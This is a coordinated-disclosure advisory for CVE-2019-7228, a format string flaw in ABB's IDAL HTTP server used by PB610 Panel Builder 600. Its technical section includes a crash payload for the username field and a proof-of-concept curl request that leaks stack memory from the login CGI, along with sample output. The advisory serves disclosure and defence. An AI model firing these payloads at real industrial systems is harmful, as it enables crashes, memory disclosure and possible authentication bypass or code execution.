ABB IDAL HTTP Server Uncontrolled Format String Vulnerability

17 June 2019

 

IDENTIFIERS   

 

 

CVE-2019-7228

ABBVU-IAMF-1902007

 

CVSS SCORE

 

8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

 

XID

 

XL-19-012

 

AFFECTED VENDORS

 

ABB (new.abb.com)

 

CREDIT

 

Eldar Marcussen - xen1thLabs - Software Labs

 

VULNERABILITY SUMMARY       

 

 

The IDAL HTTP server is vulnerable to memory corruption through insecure use of user supplied format strings. An attacker can abuse this functionality to bypass authentication or execute code on the server.

 

TECHNICAL DETAILS    

 

 

The IDAL HTTP server does not safely handle username or cookie strings during the authentication process. Attempting to authenticate with the username “%25s%25p%25x%25n” will crash the server. Sending “%08x.AAAA.%08x.%08x” will log memory content from the stack.

 

PROOF OF CONCEPT

$ curl –d 'username=%2508x.AAAA.%2508x.%2508x&password=xen1thLabs' http://targetip:81/cgi/login

 

  

 

 

 UserManagementModule::LoginCGIUser failed. User

:“72657355.AAAA.616e614d.656d6567” not present in UserFactory

HTTP logging stack values.

 

AFFECTED SYSTEMS 

  

PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 … 2.8.0.367

 

SOLUTION 

 

 

 

 

Apply the patches and instructions from vendor:

- ABB PB610:

 

DISCLOSURE TIMELINE

 

 

 

04/02/2019 - Contacted ABB requesting disclosure coordination

05/02/2019 - Provided vulnerability details

05/06/2019 – Patch available

17/06/2019 – xen1thLabs public disclosure